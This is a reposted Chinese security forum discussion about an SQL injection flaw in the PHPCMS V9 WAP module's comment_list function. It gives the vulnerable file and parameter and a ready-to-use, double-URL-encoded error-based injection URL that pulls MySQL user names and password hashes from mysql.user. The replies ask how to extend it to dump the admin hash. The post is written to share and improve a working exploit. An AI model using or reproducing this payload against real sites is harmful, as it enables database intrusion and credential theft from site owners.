[讨论]PHPCMS V9 WAP模块注入漏洞EXP |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

 

云缺陷编号:WooYun-2012-11818
文件位置:/phpcms/modules/wap/index.php
漏洞函数:comment_list()
未过滤参数:$_GET[‘commentid’]
触发条件:开启WAP模块
触发漏洞:index.php?m=wap&c=index&a=comment_list&commentid=content_12%2527-84-1

 

由于下划线在此变量会被用于分割,因此构造注入条件比较困难(v9的表里有下划线,当select * from v9_admin时,下划线被当做分割,因此v9_admin就会被分开成v9与admin两个表。)

 

讨论下爆出管理员hash的EXP或者不鸡肋的利用方法。想了许久不知如何突破下划线的问题。

 

我先抛砖引玉(爆出mysql的root密码EXP,前提当然是有权限访问mysql表):
http://www.xxoo.cn/index.php?m=wap&c=index&a=comment_list&commentid=content_12%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520concat%2528user%252C0x3a%252Cpassword%252C0x3a%2529%2529%2520from%2520mysql.user%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520mysql.user%2520group%2520by%2520x%2529a%2529%2520and%2520%2527x%2527%253D%2527x-1-1

 

3 个回复

 

回复此人 感谢
笔墨 (这世界笑了,于是你合群的一起笑了.)  | 2012-10-19 08:17
不知道base64可行不。。。

 
B1n4ry (苦逼的生存着。。。)  | 2012-10-19 08:27
@笔墨 此处Base64不行的,这是经过两次urlencode编码。

 
xsser (十根阳具有长短!!)  | 2012-10-19 11:37
表示很困难

 

原文地址:http://zone.wooyun.org/content/1357

Tags:

PHPCMSV9注入漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
[讨论]PHPCMS V9 WAP模块注入漏洞EXP |